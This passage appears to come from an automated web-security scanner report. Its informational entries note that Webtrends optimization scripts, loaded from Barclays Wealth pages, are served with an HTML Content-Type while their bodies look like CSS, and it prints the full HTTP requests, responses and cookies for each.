Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.68. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.69. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=04434c6e; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202cf02d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.70. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a598